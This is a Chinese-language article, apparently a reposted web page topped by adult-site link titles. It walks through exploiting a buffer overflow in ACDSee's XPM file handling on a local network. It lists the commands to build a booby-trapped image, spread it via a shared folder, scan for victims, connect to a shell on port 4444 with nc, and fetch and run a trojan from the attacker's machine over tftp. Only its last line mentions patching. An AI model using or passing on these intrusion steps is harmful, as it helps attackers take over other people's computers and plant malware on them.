日韩黑丝制服一区视频播放|日韩欧美人妻丝袜视频在线观看|九九影院一级蜜桃|亚洲中文在线导航|青草草视频在线观看|婷婷五月色伊人网站|日本一区二区在线|国产AV一二三四区毛片|正在播放久草视频|亚洲色图精品一区

搜索

QQ空間 QQ好友新浪微博微信

從ACDSee的漏洞看木馬入侵新思路

swolook 2010-04-20

展開全文

從ACDSee的漏洞看木馬入侵新思路
2008-04-25 09:34:19　來源:中關村在線　作者:張齊點擊: 2025

對于ACDSee的大名，想必各位都不陌生。不過最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在處理XBM/XPM/PSP/LHA文件時出現(xiàn)緩沖區(qū)溢出漏洞

對于ACDSee的大名，想必各位都不陌生。不過最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在處理XBM/XPM/PSP/LHA文件時出現(xiàn)緩沖區(qū)溢出漏洞，如果用戶打開了帶有超長字符串的XBM/XPM/PSP/LHA文件的話，就可能觸發(fā)這些溢出，導致執(zhí)行任意指令。
本次提到的漏洞影響的版本是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。我們下面就具體分析一下漏洞利用的全過程。
漏洞初顯
假設在一個局域網(wǎng)中，終端上裝有ACDSee 8.1。則這個漏洞就可以派上用場了！畢竟對于這類軟件，用戶更新較少，對于漏洞的利用率還是很高的。

ACDSee Pro 8.1
首先利用ACDSee XPM文件溢出利用工具，將其放到一個文件夾中，然后打開“記事本”，在其中輸入如下的代碼：acdsee.exe 1 test.xpm，然后保存為一個批處理文件1.bat，和利用工具acdsee.exe放到一個文件夾中?，F(xiàn)在雙擊運行1.bat，就會在這個目錄下面生成一個名字為test.xpm的文件了，這個XPM文件是默認被ACDSee程序關聯(lián)打開的。
提醒用戶，使用這個bat文件是為了執(zhí)行命令的方便，你也可以在cmd中進入到這個目錄中，然后執(zhí)行“acdsee.exe 1 test.xpm”，效果是一樣的。
我們可以先在終端上進行測試，運行XPM文件，打開ACDSee窗口后發(fā)現(xiàn)其處于崩潰狀態(tài)。這就是溢出的結果了，下面只有在“任務管理器”里把ACDSee終結了，然后“命令提示符”窗口，在其中輸入“netstat -an”命令來查看本機的端口開放情況，如果4444端口打開了，并且處于監(jiān)聽狀態(tài)，可以說萬事俱備。把這個文件發(fā)到共享區(qū)中，如果其它用戶下載并開啟了程序，則漏洞入侵就開始了。

4444端口打開了，并且處于監(jiān)聽狀態(tài)

終端陷阱
靜待一段時間，如果幸運的話，用掃描器掃描后會發(fā)現(xiàn)有4444端口開啟的終端（如圖6），下面就該用NC來連接肉雞以實現(xiàn)控制了。打開“記事本”程序，在其中輸入如下的代碼：nc 192.168.0.151 4444 （192.168.0.151是目標終端的IP地址，4444就是它打開的待接端口），然后保存為一個批處理文件2.bat，和nc.exe放在同一個目錄里。

端口掃描

雙擊運行2.bat這個文件，看見了？我們的NC順利的連接上了肉雞（如圖7），并且返回了一個CMDShell，現(xiàn)在我們在這個窗口里的操作就等同于在肉雞上執(zhí)行命令了，嘻嘻。該是上傳個木馬的時候了，總不能什么都在這個命令提示符里操作吧，多不方便啊。說到上傳木馬，黑客最常用的就是tftp上傳了，但是小菜們可能還不太熟悉tftp的使用，下面我來詳細操作一下。
　　 上傳木馬
接下來的入侵方法就簡單了，比如通過木馬客戶端，利用“TFTPD32”把它和我們要上傳的木馬muma.exe放到同一個一個目錄下,運行它之后就會自動在本機搭建一個TFTP服務器了。最后，將TFTPD32最小化，在剛剛得到的CMDShell里輸入如下命令并回車確定： tftp -i 192.168.0.149 get muma.exe D:\muma.exe，就可以看到上傳成功的顯示了。

IPConfig

TFTPD32

192.168.0.149是本地的IP地址，這條命令作用是把本機上的和TFTPD32在同一目錄下的muma.exe上傳到192.168.0.151上，并且放置到D:\下。如果muma.exe不是和TFTPD32.exe放在同一目錄下的話，也可以把上句中的muma.exe換成絕對路徑，比如C:\windows\muma.exe，一樣可以成功上傳。
輸入命令muma.exe運行即可，至此，一次完整的漏洞利用及入侵過程就結束了，ACDSee的這個漏洞非常隱蔽，但對于局域網(wǎng)用戶來說卻異?？膳?，管理員還是批量升級軟件吧。